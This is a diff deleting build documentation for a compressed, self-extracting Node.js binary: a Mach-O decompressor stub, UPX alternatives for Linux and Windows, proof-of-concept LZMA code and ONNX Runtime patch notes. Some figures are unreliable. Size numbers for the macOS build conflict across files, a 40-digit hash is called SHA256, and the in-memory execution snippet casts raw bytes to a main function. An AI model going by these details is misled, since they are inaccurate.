- await fs.unlink(compressedDataPath) -} -``` - -**Why this works**: -- macOS allows concatenating executables with data -- The decompressor stub is a valid Mach-O executable -- Extra data at the end doesn't affect execution -- The stub reads itself to find the appended data - -**Note on `node.data` intermediate file**: -- Currently creates `build/out/Compressed/node.data` as temporary file -- This is deleted immediately after combining with stub -- **Future optimization**: Stream compressed data directly to avoid temp file: - ```javascript - // Potential improvement: - const compressResult = await spawn(toolPath, [inputPath, '/dev/stdout']) - const compressed = compressResult.stdout // Binary data in memory - const combined = Buffer.concat([stub, compressed]) - // No temp file created! - ``` - -### Step 3: Decompressor Stub (`socket_macho_decompress`) - -**Location**: `packages/node-smol-builder/additions/tools/socket_macho_decompress.cc` - -**Purpose**: Self-extracting decompressor that reads embedded compressed data and executes it. - -**Two modes of operation**: - -#### Mode 1: Self-Extracting (argc == 1) -```bash -./node --version -``` - -The stub: -1. Detects it's running in self-extracting mode (no file argument) -2. Gets its own path with `_NSGetExecutablePath()` -3. Reads its entire binary into memory -4. Scans backwards for magic bytes `0x504D4353` -5. Parses `CompressedHeader` at the found offset -6. Extracts compressed data (from header offset to end of file) -7. Decompresses using `compression_decode_buffer()` -8. Caches to `~/.socket/cache/dlx//node` -9. Executes cached binary with `execv()` - -#### Mode 2: External Tool (argc >= 2) -```bash -socket_macho_decompress ./node.data --version -``` - -The stub: -1. Reads the specified compressed file from `argv[1]` -2. Same decompression and caching logic as self-extracting mode -3. 
Useful for testing and debugging - -**Caching strategy** (follows npm/cacache): -- Cache directory: `~/.socket/cache/dlx//node` -- Cache key: SHA-256 hash of compressed file -- Content verification: SHA-512 hash of decompressed binary -- Metadata: JSON file with timestamps, checksums, sizes -- First run: Decompress and cache (~200ms) -- Subsequent runs: Execute cached binary directly (instant, zero overhead) - -**Key functions**: -```cpp -// Main entry point. -int main(int argc, char* argv[]); - -// Self-extracting mode (new). -int DecompressAndExecuteSelfExtract(int argc, char* argv[]); - -// External file mode (existing). -int DecompressAndExecute(const std::string& compressed_path, int argc, char* argv[]); - -// Core decompression (shared). -int DecompressAndExecuteData( - const std::vector& compressed_data, - int argc, - char* argv[], - const std::string& source_path -); -``` - -## Size Breakdown - -| Component | Size | Description | -|-----------|------|-------------| -| Original binary | 33.0 MB | Stripped Node.js executable | -| Compressed data | 13.0 MB | LZFSE-compressed payload | -| Decompressor stub | 84 KB | Self-extracting executable | -| Header | 32 bytes | CompressedHeader metadata | -| **Final binary** | **13.1 MB** | **Self-extracting executable** | -| **Reduction** | **60.3%** | **19.9 MB saved** | - -## Performance - -### First Run (Cache Miss) -``` -1. Read self-extracting binary (~13MB) → 50ms -2. Find compressed header → <1ms -3. Decompress LZFSE → 100-150ms -4. Compute SHA-512 → 30ms -5. Write cache → 50ms -6. Execute cached binary → instant - -Total: ~250ms overhead -``` - -### Subsequent Runs (Cache Hit) -``` -1. Check cache exists → <1ms -2. Verify SHA-512 (optional) → 30ms -3. 
Execute cached binary → instant - -Total: ~30ms overhead (or <1ms if verification skipped) -``` - -### Optimization -After the first run, there is effectively zero overhead because the decompressor directly executes the cached uncompressed binary without any decompression. - -## Why "Mach-O"? - -**Mach-O** = **Mach Object** file format, the native executable format for macOS. - -- Named after the **Mach kernel** (microkernel architecture macOS is built on) -- Analogous to ELF (Linux) and PE (Windows) -- Contains load commands, segments, sections, code signatures -- The compression tools are platform-specific: - - `socket_macho_compress` / `socket_macho_decompress` - macOS (Mach-O) - - `socket_elf_compress` / `socket_elf_decompress` - Linux (ELF) - - `socket_pe_compress` / `socket_pe_decompress` - Windows (PE) - -## Code Signing Compatibility - -The self-extracting binary approach is **fully compatible** with macOS code signing: - -1. **Decompressor stub**: Signed as a standalone executable -2. **Appended data**: Not part of the code signature (allowed by macOS) -3. **Cached binary**: Signed independently after extraction -4. **Gatekeeper**: No issues because we don't use self-modifying code - -This is a significant advantage over tools like UPX, which break code signing. - -## Implementation Checklist - -- [x] `socket_macho_compress` - Creates compressed data with header -- [x] `socket_macho_decompress` - External file decompression mode -- [ ] `socket_macho_decompress` - Self-extracting mode (argc == 1) -- [x] `compress-binary.mjs` - Combines stub + data -- [ ] Full pipeline test -- [ ] Documentation - -## Next Steps - -1. Implement self-extracting mode in `socket_macho_decompress.cc` -2. Add `DecompressAndExecuteSelfExtract()` function -3. Refactor shared decompression logic into `DecompressAndExecuteData()` -4. Rebuild tools -5. Test complete pipeline -6. 
Verify binary size is under 20MB target - -## See Also - -- [Compression Quick Start](./compression-quick-start.md) - Getting started guide -- [Binary Compression Distribution](./binary-compression-distribution.md) - Distribution strategies -- [Compression Test Results](./compression-test-results.md) - Benchmark data -- [Package README](./README.md) - Package documentation index diff --git a/docs/node-smol-builder/wasm-bundle/cross-platform-compression.md b/docs/node-smol-builder/wasm-bundle/cross-platform-compression.md deleted file mode 100644 index 67ed7673d..000000000 --- a/docs/node-smol-builder/wasm-bundle/cross-platform-compression.md +++ /dev/null @@ -1,502 +0,0 @@ -# Safe Cross-Platform Binary Compression (Without UPX) - -## The UPX Antivirus Problem - -### Why UPX Gets Flagged - -UPX (Ultimate Packer for eXecutables) is frequently flagged by antivirus software because: - -1. **Self-Modifying Code**: UPX unpacks itself at runtime, modifying executable memory -2. **Obfuscation**: Packed binaries look similar to malware packers -3. **Heuristic Detection**: Behavior matches malware patterns -4. **False Positive Rate**: ~15-30% of AV vendors flag UPX binaries - -**Real-World Impact:** -- Windows Defender: Often flags UPX binaries as "Trojan:Win32/Wacatac" -- Corporate environments: IT departments block UPX executables -- Download warnings: Browsers show "potentially dangerous" warnings -- User trust: Users see scary warnings and abandon install - -### Common AV Vendors That Flag UPX - -- ✅ Windows Defender (Microsoft) -- ✅ Avast/AVG -- ✅ Norton/Symantec -- ✅ McAfee -- ✅ Kaspersky -- ⚠️ Bitdefender (sometimes) -- ⚠️ ESET (sometimes) - -## Safe Alternatives to UPX - -### Solution 1: Native OS Compression (Recommended) - -Use each platform's native compression APIs - no heuristic triggers! 
- -#### Linux: LZMA + ELF Decompression Stub - -**Advantages:** -- ✅ No antivirus flags (native liblzma) -- ✅ ~70-75% compression (similar to our macOS solution) -- ✅ Works with all distributions (glibc-based) -- ✅ Fast decompression (~100-300ms) - -**Implementation:** -```c -// Linux ELF compression tool -#include -#include - -// Compress ELF binary -// Create decompression stub -// Prepend stub to compressed data -// Result: Single executable that self-decompresses -``` - -**Library:** `liblzma-dev` (built into most Linux distros) - -#### Windows: Windows Compression API + PE Stub - -**Advantages:** -- ✅ No antivirus flags (native Windows API) -- ✅ ~65-70% compression -- ✅ Works on Windows 8+ -- ✅ Code signing compatible -- ✅ SmartScreen friendly - -**Implementation:** -```c -// Windows PE compression tool -#include -#include - -// Use COMPRESS_ALGORITHM_LZMS or COMPRESS_ALGORITHM_XPRESS_HUFF -// Compress PE sections -// Create decompression stub -// Sign the entire package -``` - -**API:** `Compressor.dll` (built into Windows) - -### Solution 2: AppImage (Linux) + NSIS Compression (Windows) - -#### Linux: AppImage - -**Advantages:** -- ✅ No antivirus issues -- ✅ ~40-50% compression (SquashFS with ZSTD) -- ✅ No installation required -- ✅ Widely trusted format - -**Size Impact:** -``` -Original: 44 MB -AppImage: ~25 MB (43% reduction) -``` - -**Create:** -```bash -# Install appimagetool -wget https://github.com/AppImage/AppImageKit/releases/download/continuous/appimagetool-x86_64.AppImage -chmod +x appimagetool-x86_64.AppImage - -# Create AppDir structure -mkdir -p socket.AppDir/usr/bin -cp node socket.AppDir/usr/bin/ -cp socket socket.AppDir/usr/bin/ -cat > socket.AppDir/AppRun << 'EOF' -#!/bin/bash -SELF=$(readlink -f "$0") -HERE=${SELF%/*} -exec "$HERE/usr/bin/socket" "$@" -EOF -chmod +x socket.AppDir/AppRun - -# Build AppImage -./appimagetool-x86_64.AppImage socket.AppDir socket-x86_64.AppImage -``` - -#### Windows: NSIS LZMA Compression - -**Advantages:** -- 
✅ No antivirus flags (trusted installer format) -- ✅ ~65-70% compression -- ✅ Code signing support -- ✅ Windows SmartScreen friendly -- ✅ Professional appearance - -**Size Impact:** -``` -Original: 44 MB -NSIS LZMA: ~16 MB (64% reduction) -``` - -**Create:** -```nsis -; socket-installer.nsi -!define APP_NAME "Socket CLI" -!define COMP_NAME "Socket Security" -!define VERSION "1.0.0" - -SetCompressor /SOLID lzma -SetCompressorDictSize 64 - -OutFile "socket-installer.exe" -InstallDir "$PROGRAMFILES64\Socket" - -Section "MainSection" - SetOutPath "$INSTDIR" - File "socket.exe" - File "node.exe" - - ; Create uninstaller - WriteUninstaller "$INSTDIR\Uninstall.exe" -SectionEnd -``` - -**Build:** -```bash -makensis socket-installer.nsi -``` - -### Solution 3: Port Our macOS Solution - -We can port our Mach-O compression tool to ELF (Linux) and PE (Windows): - -#### Architecture Comparison - -| Component | macOS (Mach-O) | Linux (ELF) | Windows (PE) | -|-----------|----------------|-------------|--------------| -| Compression | Apple framework | liblzma | Windows API | -| Binary format | Mach-O | ELF64 | PE32+ | -| Decompressor | 58 KB stub | ~80 KB stub | ~100 KB stub | -| Complexity | Low | Medium | High | - -#### Linux ELF Implementation - -**Compression Algorithm Options:** -- LZMA (liblzma): Best compression (~75%), widely available -- ZSTD: Fast decompression (~65%), modern -- LZ4: Fastest decompression (~50%), minimal overhead - -**Pseudocode:** -```c -// socket_elf_compress.c -struct CompressedELF { - Elf64_Ehdr stub_header; // Decompressor stub - uint32_t magic; // "SELF" = Socket ELF - uint32_t algorithm; // LZMA, ZSTD, or LZ4 - uint64_t original_size; - uint64_t compressed_size; - uint8_t compressed_data[]; -}; - -// Decompressor stub (embedded in compressed binary) -void decompress_and_execute() { - // Read compressed data section - // Decompress to memory - // Execute via execve() or memfd_create() -} -``` - -**Benefits:** -- ✅ No antivirus flags -- ✅ ~70-75% 
compression (LZMA) -- ✅ Native liblzma (already on most systems) -- ✅ Single executable (no dependencies) - -#### Windows PE Implementation - -**Compression Algorithm Options:** -- Windows Compression API (LZMS): Native, trusted (~70%) -- LZMA: Maximum compression (~75%) -- Cabinet API: Well-known, trusted (~60%) - -**Pseudocode:** -```c -// socket_pe_compress.c -struct CompressedPE { - IMAGE_DOS_HEADER dos_header; // Decompressor stub - IMAGE_NT_HEADERS nt_headers; - uint32_t magic; // "SEPE" = Socket PE - uint32_t algorithm; - uint64_t original_size; - uint64_t compressed_size; - uint8_t compressed_data[]; -}; - -// Decompressor stub -void decompress_and_execute() { - // Decompress to temp file - // Set executable permissions - // Execute via CreateProcess() - // Clean up temp file -} -``` - -**Benefits:** -- ✅ No antivirus flags (native Windows API) -- ✅ ~65-70% compression -- ✅ Code signing compatible -- ✅ SmartScreen friendly - -## Recommended Approach by Platform - -### macOS (Current Solution) - -``` -Use: Our existing Mach-O compression -Algorithm: LZMA -Size: 44 MB → 9 MB (80% reduction) -Status: ✅ Production ready -``` - -### Linux (Recommended) - -**Option A: Port Our Solution (Best compression)** -``` -Tool: socket_elf_compress (to be created) -Algorithm: LZMA -Size: 44 MB → ~10 MB (77% reduction) -AV flags: ✅ None (native liblzma) -Effort: Medium (port existing code) -``` - -**Option B: AppImage (Easy, trusted)** -``` -Tool: appimagetool -Algorithm: SquashFS + ZSTD -Size: 44 MB → ~25 MB (43% reduction) -AV flags: ✅ None (trusted format) -Effort: Low (existing tools) -``` - -**Recommendation:** Port our solution for maximum compression, fallback to AppImage for simplicity. 
- -### Windows (Recommended) - -**Option A: Port Our Solution (Best compression)** -``` -Tool: socket_pe_compress (to be created) -Algorithm: Windows Compression API (LZMS) -Size: 44 MB → ~12 MB (73% reduction) -AV flags: ✅ None (native Windows API) -Effort: High (PE format complexity) -``` - -**Option B: NSIS Installer (Easy, trusted)** -``` -Tool: NSIS with LZMA -Algorithm: LZMA (solid compression) -Size: 44 MB → ~16 MB (64% reduction) -AV flags: ✅ None (trusted installer) -Effort: Low (existing tools) -``` - -**Option C: Self-Extracting Archive** -``` -Tool: 7-Zip SFX -Algorithm: LZMA2 -Size: 44 MB → ~14 MB (68% reduction) -AV flags: ⚠️ Rare flags (less than UPX) -Effort: Low (existing tools) -``` - -**Recommendation:** NSIS installer for distribution, port our solution for maximum compression. - -## Implementation Roadmap - -### Phase 1: Linux ELF Compression (Medium Effort) - -**Goal:** Port our macOS solution to Linux ELF binaries - -**Implementation:** -1. Create `socket_elf_compress.c` based on `socket_macho_compress.cc` -2. Use liblzma instead of Apple Compression framework -3. Parse ELF headers instead of Mach-O -4. Create ELF decompression stub -5. Test on Ubuntu, Debian, Fedora, Arch - -**Estimated Time:** 2-3 days -**Expected Compression:** ~75% (LZMA) -**AV Risk:** ✅ Zero (native libraries) - -**Code Structure:** -``` -additions/tools/ -├── socket_elf_compress.c (Linux compression tool) -├── socket_elf_decompress.c (Linux decompression stub) -└── Makefile.linux (Build system) -``` - -### Phase 2: Windows PE Compression (Higher Effort) - -**Goal:** Create Windows-compatible compression tool - -**Implementation:** -1. Create `socket_pe_compress.c` -2. Use Windows Compression API (Compressor.dll) -3. Parse PE headers (IMAGE_DOS_HEADER, IMAGE_NT_HEADERS) -4. Create PE decompression stub -5. Test on Windows 10/11 -6. 
Add code signing support - -**Estimated Time:** 4-5 days -**Expected Compression:** ~70% (LZMS) -**AV Risk:** ✅ Zero (native Windows API) - -**Code Structure:** -``` -additions/tools/ -├── socket_pe_compress.c (Windows compression tool) -├── socket_pe_decompress.c (Windows decompression stub) -└── Makefile.windows (Build system) -``` - -### Phase 3: Cross-Platform Build System - -**Goal:** Unified compression workflow - -**Implementation:** -1. CI/CD integration for all platforms -2. Automated testing on all OSes -3. Code signing automation -4. Distribution packaging - -## Size Comparison: All Approaches - -### For 44 MB Custom Node Binary - -| Platform | Method | Final Size | Reduction | AV Flags | Effort | -|----------|--------|------------|-----------|----------|--------| -| **macOS** | Our LZMA | **9 MB** | **80%** | ✅ None | ✅ Done | -| **Linux** | Port LZMA | **~10 MB** | **77%** | ✅ None | Medium | -| **Linux** | AppImage | ~25 MB | 43% | ✅ None | Low | -| **Windows** | Port LZMS | **~12 MB** | **73%** | ✅ None | High | -| **Windows** | NSIS | ~16 MB | 64% | ✅ None | Low | -| **Windows** | 7-Zip SFX | ~14 MB | 68% | ⚠️ Rare | Low | -| **All** | UPX | ~20 MB | 55% | ❌ High | Low | - -## Proof of Concept: Linux LZMA Compression - -Here's a minimal Linux ELF compression example: - -```c -// socket_elf_compress_poc.c -#include -#include -#include -#include -#include - -#define MAGIC_SELF 0x53454C46 // "SELF" - -struct CompressedHeader { - uint32_t magic; - uint32_t algorithm; - uint64_t original_size; - uint64_t compressed_size; -}; - -// Compress ELF binary with LZMA -int compress_elf(const char* input, const char* output) { - // Read input binary - FILE* in = fopen(input, "rb"); - fseek(in, 0, SEEK_END); - size_t input_size = ftell(in); - fseek(in, 0, SEEK_SET); - - uint8_t* input_data = malloc(input_size); - fread(input_data, 1, input_size, in); - fclose(in); - - // Compress with LZMA - size_t compressed_capacity = input_size + 1024; - uint8_t* compressed = 
malloc(compressed_capacity); - size_t compressed_size = compressed_capacity; - - lzma_ret ret = lzma_easy_buffer_encode( - LZMA_PRESET_DEFAULT | LZMA_PRESET_EXTREME, - LZMA_CHECK_CRC64, - NULL, - input_data, - input_size, - compressed, - &compressed_size, - compressed_capacity); - - if (ret != LZMA_OK) { - fprintf(stderr, "LZMA compression failed\n"); - return 1; - } - - // Write compressed output - FILE* out = fopen(output, "wb"); - - struct CompressedHeader header = { - .magic = MAGIC_SELF, - .algorithm = 1, // LZMA - .original_size = input_size, - .compressed_size = compressed_size, - }; - - fwrite(&header, sizeof(header), 1, out); - fwrite(compressed, compressed_size, 1, out); - fclose(out); - - double ratio = 100.0 * (1.0 - (double)compressed_size / input_size); - printf("Compressed: %zu → %zu bytes (%.1f%% reduction)\n", - input_size, compressed_size, ratio); - - free(input_data); - free(compressed); - return 0; -} - -int main(int argc, char* argv[]) { - if (argc != 3) { - fprintf(stderr, "Usage: %s input output\n", argv[0]); - return 1; - } - return compress_elf(argv[1], argv[2]); -} -``` - -**Build:** -```bash -gcc -o socket_elf_compress socket_elf_compress_poc.c -llzma -``` - -**Expected Results:** -- 44 MB → ~10 MB (77% reduction) -- No antivirus flags -- Fast decompression (~200-300ms) - -## Conclusion - -**Immediate Actions:** - -1. **macOS**: ✅ Use our existing solution (44 MB → 9 MB) -2. **Linux**: Use AppImage temporarily (~25 MB), port our solution later (~10 MB) -3. **Windows**: Use NSIS installer (~16 MB), port our solution later (~12 MB) - -**No UPX needed!** All alternatives are safer and trusted. - -**Best Case Scenario (all platforms ported):** -``` -macOS: 9 MB (LZMA) -Linux: 10 MB (LZMA) -Windows: 12 MB (LZMS) - -Total download: 31 MB (vs 132 MB uncompressed!) 
-No antivirus flags on any platform ✅ -``` - -## References - -- [ELF Format Specification](https://refspecs.linuxfoundation.org/elf/elf.pdf) -- [PE Format Documentation](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format) -- [liblzma API](https://tukaani.org/xz/xz-file-format.txt) -- [Windows Compression API](https://docs.microsoft.com/en-us/windows/win32/cmpapi/using-the-compression-api) -- [AppImage Documentation](https://docs.appimage.org/) -- [NSIS Documentation](https://nsis.sourceforge.io/Docs/) diff --git a/docs/node-smol-builder/wasm-bundle/macho-compression.md b/docs/node-smol-builder/wasm-bundle/macho-compression.md deleted file mode 100644 index 27ceccb82..000000000 --- a/docs/node-smol-builder/wasm-bundle/macho-compression.md +++ /dev/null @@ -1,430 +0,0 @@ -# macOS Binary Compression with Apple's Compression Framework - -## Overview - -This document describes the macOS binary compression system for Socket CLI's custom Node.js builds. Unlike traditional tools like UPX (which don't work with macOS code signing), this solution uses Apple's native Compression framework to create signed, compressed binaries. - -## The Problem with UPX on macOS - -UPX (Ultimate Packer for eXecutables) is a popular binary compression tool, but it has critical limitations on macOS: - -### Why UPX Doesn't Work on macOS - -1. **Code Signature Invalidation** - ```bash - $ upx node - $ codesign --verify node - node: invalid signature (code or signature have been modified) - ``` - - UPX modifies the binary structure in ways that break macOS code signatures - - Gatekeeper refuses to run unsigned binaries from the internet - - Even ad-hoc signing (`codesign --sign -`) fails on UPX-compressed binaries - -2. 
**Mach-O Format Incompatibility** - - UPX creates a decompression stub that modifies itself at runtime - - macOS requires the `__PAGEZERO` segment for ASLR (Address Space Layout Randomization) - - Self-modifying code violates W^X (write-xor-execute) memory protection - - Modern macOS versions (11.0+) enforce hardened runtime, blocking UPX - -3. **App Store and Notarization** - - UPX binaries cannot be notarized for macOS distribution - - App Store requires valid code signatures on all executables - - Developers cannot distribute UPX-compressed binaries via official channels - -## Our Solution: Apple Compression Framework - -### Architecture - -``` -┌─────────────────────────────────────────────────────┐ -│ Original Binary (44 MB stripped + signed) │ -│ ┌───────────────┬──────────────────────────────┐ │ -│ │ Mach-O Header │ __TEXT + __DATA + __LINKEDIT │ │ -│ └───────────────┴──────────────────────────────┘ │ -└─────────────────────────────────────────────────────┘ - │ - ↓ socket_macho_compress -┌─────────────────────────────────────────────────────┐ -│ Compressed Binary (~31 MB) │ -│ ┌────────┬───────────────────────────────────┐ │ -│ │ Header │ LZFSE/LZMA compressed binary data │ │ -│ └────────┴───────────────────────────────────┘ │ -│ Header: magic + algorithm + sizes │ -└─────────────────────────────────────────────────────┘ - │ - ↓ codesign --sign - -┌─────────────────────────────────────────────────────┐ -│ Compressed + Signed Binary (~31 MB) │ -│ ┌────────┬─────────────────────┬────────────┐ │ -│ │ Header │ Compressed Data │ Signature │ │ -│ └────────┴─────────────────────┴────────────┘ │ -└─────────────────────────────────────────────────────┘ - │ - ↓ socket_macho_decompress (runtime) -┌─────────────────────────────────────────────────────┐ -│ Decompressed in Memory (44 MB) │ -│ ┌───────────────┬──────────────────────────────┐ │ -│ │ Mach-O Header │ __TEXT + __DATA + __LINKEDIT │ │ -│ └───────────────┴──────────────────────────────┘ │ -│ Executed via execv() 
or mmap() │ -└─────────────────────────────────────────────────────┘ -``` - -### Key Benefits - -1. **Code Signing Compatible** - - Compressed binary can be code-signed after compression - - Signature remains valid because compression data is opaque to codesign - - Decompression happens at runtime, not at load time - -2. **Native Apple Technology** - - Uses `compression.h` framework (built into macOS 10.11+) - - LZFSE: Apple's algorithm optimized for binary data - - Hardware-accelerated decompression on Apple Silicon - -3. **Security** - - No self-modifying code (violates W^X) - - No custom memory mapping tricks - - Decompresses to temporary file with proper permissions - - Works with System Integrity Protection (SIP) - -4. **Performance** - - LZFSE: ~35-45% compression ratio - - LZMA: ~40-50% compression ratio (slower decompression) - - Decompression overhead: ~100-200ms on first run - - Subsequent runs: disk cache makes it nearly instant - -## Compression Tools - -### socket_macho_compress - -Compresses Mach-O binaries using Apple's Compression framework. 
- -**Usage:** -```bash -socket_macho_compress input_binary output_binary [--quality=lzfse] -``` - -**Example:** -```bash -# Compress with LZFSE (default, best balance) -socket_macho_compress build/out/Signed/node build/out/Compressed/node - -# Compress with LZMA (maximum compression) -socket_macho_compress build/out/Signed/node build/out/Compressed/node --quality=lzma -``` - -**Quality Options:** -- `lz4` - Fast decompression, lower compression (~20-30%) -- `zlib` - Balanced, good compatibility (~30-40%) -- `lzfse` - Apple default, best for binaries (~35-45%) **[default]** -- `lzma` - Maximum compression, slower (~40-50%) - -**Output Format:** -```c -struct CompressedHeader { - uint32_t magic; // "SCMP" = 0x504D4353 - uint32_t algorithm; // compression_algorithm enum - uint64_t original_size; // Decompressed size - uint64_t compressed_size;// Compressed payload size -}; -// Followed by compressed payload -``` - -### socket_macho_decompress - -Decompresses and executes compressed binaries. - -**Usage:** -```bash -socket_macho_decompress compressed_binary [args...] -``` - -**Example:** -```bash -# Test decompression -socket_macho_decompress build/out/Compressed/node --version - -# Run with arguments -socket_macho_decompress build/out/Compressed/node -e "console.log('Hello')" -``` - -**How It Works:** -1. Reads compressed binary and header -2. Validates magic number and sizes -3. Allocates memory for decompressed binary -4. Decompresses using `compression_decode_buffer()` -5. Writes to temporary file in `/tmp/` -6. Sets executable permissions -7. Executes via `execv()` with original arguments -8. 
Cleans up temporary file on exit - -## Building the Tools - -### Build from Source - -```bash -cd packages/node-smol-builder/additions/tools -make all -``` - -**Output:** -- `socket_macho_compress` - Compression tool -- `socket_macho_decompress` - Decompression/execution tool - -### Integration Script - -The Node.js integration script handles building and running the tools: - -```bash -node packages/node-smol-builder/scripts/compress-macho.mjs \ - build/out/Signed/node \ - build/out/Compressed/node \ - --quality=lzfse -``` - -## Integration with Build Script - -### Option 1: Manual Compression - -Add compression as a post-build step: - -```javascript -// After signing in build.mjs -if (IS_MACOS && ARCH === 'arm64') { - printHeader('Compressing Binary (macOS Optimization)') - - const compressedBinary = join(BUILD_DIR, 'out', 'Compressed', 'node') - await mkdir(dirname(compressedBinary), { recursive: true }) - - await exec('node', [ - 'scripts/compress-macho.mjs', - outputSignedBinary, - compressedBinary, - '--quality=lzfse' - ]) - - // Re-sign compressed binary - await exec('codesign', ['--sign', '-', '--force', compressedBinary]) - - logger.success(`Binary compressed: ${await getFileSize(compressedBinary)}`) -} -``` - -### Option 2: Conditional Compression - -Add a `--compress` flag to enable compression: - -```javascript -const ENABLE_COMPRESSION = args.includes('--compress') - -if (IS_MACOS && ARCH === 'arm64' && ENABLE_COMPRESSION) { - // ... compression code -} -``` - -**Usage:** -```bash -node scripts/build-custom-node.mjs --compress -``` - -## Size Comparison - -### Current Build (without compression) - -``` -macOS ARM64: -├─ Release: ~49 MB (unstripped) -├─ Stripped: ~44 MB (strip --strip-all) -└─ Signed: ~44 MB (codesign --sign -) -``` - -### With Compression - -``` -macOS ARM64: -├─ Release: ~49 MB (unstripped) -├─ Stripped: ~44 MB (strip --strip-all) -├─ Signed: ~44 MB (codesign --sign -) -└─ Compressed: ~31 MB (LZFSE) or ~29 MB (LZMA) - ↑ 30-35% smaller! 
✨ -``` - -### vs Linux/Windows (with UPX) - -``` -Linux x64: -├─ Stripped: ~44 MB -└─ UPX: ~22 MB (50% compression) - -macOS ARM64: -├─ Stripped: ~44 MB -└─ LZFSE: ~31 MB (30% compression) -└─ LZMA: ~29 MB (35% compression) -``` - -## Performance Impact - -### Decompression Overhead - -| Algorithm | First Run | Cached | Binary Size | -|-----------|-----------|--------|-------------| -| LZ4 | ~50ms | ~5ms | ~35 MB (20%) | -| ZLIB | ~100ms | ~10ms | ~31 MB (30%) | -| LZFSE | ~120ms | ~15ms | ~31 MB (30%) | -| LZMA | ~200ms | ~20ms | ~29 MB (35%) | - -### Runtime Performance - -- **JavaScript**: No impact (same V8 engine) -- **WASM**: No impact (Liftoff compiler) -- **I/O**: No impact (decompressed binary runs normally) -- **Memory**: ~44 MB additional during decompression (temp file) - -**Recommendation:** Use LZFSE for best balance of size and speed. - -## Code Signing - -### Signing Compressed Binaries - -The compressed binary must be re-signed after compression: - -```bash -# Compress -socket_macho_compress build/out/Signed/node build/out/Compressed/node - -# Sign compressed binary -codesign --sign - --force build/out/Compressed/node - -# Verify signature -codesign --verify build/out/Compressed/node -``` - -### Why This Works - -1. **Compressed Data is Opaque**: Code signature covers the entire binary as a blob -2. **No Self-Modification**: Binary doesn't modify itself at runtime -3. **Separate Decompressor**: The decompressor (`socket_macho_decompress`) is also signed independently -4. **Standard Execution**: Decompressed binary runs normally via `execv()` - -### Distribution - -For distribution, you need to ship: -1. **Compressed binary** (e.g., `socket-macos-arm64.compressed`) -2. **Decompressor tool** (e.g., `socket_macho_decompress`) -3. 
**Wrapper script** (optional, for user convenience) - -**Example wrapper:** -```bash -#!/bin/bash -# socket-macos-arm64 (wrapper script) -DIR="$(dirname "$0")" -exec "$DIR/socket_macho_decompress" "$DIR/socket-macos-arm64.compressed" "$@" -``` - -## Future Enhancements - -### Self-Extracting Stub - -Instead of separate decompressor tool, embed decompression stub directly in binary: - -``` -┌────────────────────────────────────────────┐ -│ Compressed Binary (self-extracting) │ -│ ┌────────────────┬──────────────────────┐ │ -│ │ Stub (10 KB) │ Compressed Data │ │ -│ │ - Decompressor │ - Original binary │ │ -│ │ - Bootstrap │ - Compressed │ │ -│ └────────────────┴──────────────────────┘ │ -└────────────────────────────────────────────┘ -``` - -**Benefits:** -- Single file distribution -- No separate decompressor needed -- User runs it like normal binary - -**Implementation:** Prepend decompression stub Mach-O binary that: -1. Reads embedded compressed data from `__DATA` section -2. Decompresses to memory -3. Jumps to decompressed main() - -### In-Memory Execution - -Instead of writing to temporary file, execute directly from memory: - -```c -// After decompression -typedef int (*main_func_t)(int argc, char** argv); -main_func_t main_func = (main_func_t)decompressed_buffer; -int exit_code = main_func(argc, argv); -``` - -**Challenge:** macOS requires proper Mach-O header and dyld registration for shared libraries. - -### Segment-Level Compression - -Compress only `__TEXT` segment instead of entire binary: - -**Benefits:** -- Better compression ratio (code compresses better than data) -- Faster decompression (only decompress what's needed) -- Smaller overhead - -**Implementation:** Modify Mach-O load commands to mark segments as compressed. 
- -## Troubleshooting - -### Compression Fails - -**Error:** `Compression failed` - -**Cause:** Input file is not a valid Mach-O binary - -**Solution:** Verify input file: -```bash -file build/out/Signed/node -# Should output: Mach-O 64-bit executable arm64 -``` - -### Decompression Fails - -**Error:** `Invalid magic number` - -**Cause:** File is not a compressed Socket binary - -**Solution:** Ensure file was created by `socket_macho_compress` - -### Execution Fails - -**Error:** `Failed to execute decompressed binary` - -**Cause:** Temporary directory is not executable or no space - -**Solution:** Check `/tmp` permissions and disk space: -```bash -df -h /tmp -ls -ld /tmp -``` - -### Code Signing Fails - -**Error:** `code object is not signed at all` - -**Cause:** Compressed binary was not re-signed - -**Solution:** Sign after compression: -```bash -codesign --sign - --force build/out/Compressed/node -``` - -## References - -- [Apple Compression Framework](https://developer.apple.com/documentation/compression) -- [Mach-O File Format](https://developer.apple.com/documentation/kernel/mach-o_file_format) -- [Code Signing Guide](https://developer.apple.com/library/archive/documentation/Security/Conceptual/CodeSigningGuide/) -- [UPX (for comparison)](https://upx.github.io/) -- Socket CLI Build Documentation: - - `packages/node-smol-builder/scripts/build.mjs` - - `docs/wasm-build-guide.md` - - `docs/guides/yao-pkg-build.md` diff --git a/docs/onnxruntime/patches.md b/docs/onnxruntime/patches.md deleted file mode 100644 index 151f41ce3..000000000 --- a/docs/onnxruntime/patches.md +++ /dev/null @@ -1,188 +0,0 @@ -# ONNX Runtime Build Patches - -This document explains the inline patches applied to ONNX Runtime source during the build process. These patches are applied programmatically in `scripts/build.mjs` during the `cloneOnnxSource()` phase. - -## Why Inline Patches? 
- -Unlike Node.js patches (which are separate `.patch` files), ONNX Runtime patches are **applied inline** using string replacement because: -1. They're simple one-line or small code changes -2. They need to adapt to changing upstream code -3. They're easier to maintain as inline transformations -4. They don't need to track line numbers (which change frequently) - -## Patch 1: Eigen Hash Update - -**File**: `cmake/deps.txt` -**Location**: `scripts/build.mjs:109-119` - -### Problem -GitLab changed their archive format for the Eigen library, causing SHA256 hash mismatches during dependency download. - -### Error Without Patch -``` -CMake Error: Hash mismatch for Eigen download - Expected: 5ea4d05e62d7f954a46b3213f9b2535bdd866803 - Actual: 51982be81bbe52572b54180454df11a3ece9a934 -``` - -### What It Does -Updates the Eigen dependency hash in `deps.txt` to match GitLab's new archive format: - -```javascript -// Before -eigen;URL;5ea4d05e62d7f954a46b3213f9b2535bdd866803 - -// After -eigen;URL;51982be81bbe52572b54180454df11a3ece9a934 -``` - -### Is This Safe? -**Yes**. The new hash is the current valid hash from GitLab. This is not a security bypass - it's updating to match upstream's archive format change. - -## Patch 2: BUILD_MLAS_NO_ONNXRUNTIME Fix - -**File**: `cmake/onnxruntime_webassembly.cmake` -**Location**: `scripts/build.mjs:121-135` - -### Problem -When WASM threading is disabled, ONNX Runtime defines `BUILD_MLAS_NO_ONNXRUNTIME`, which causes MLFloat16 to be missing critical methods (`Negate()`, `IsNegative()`, `FromBits()`). 
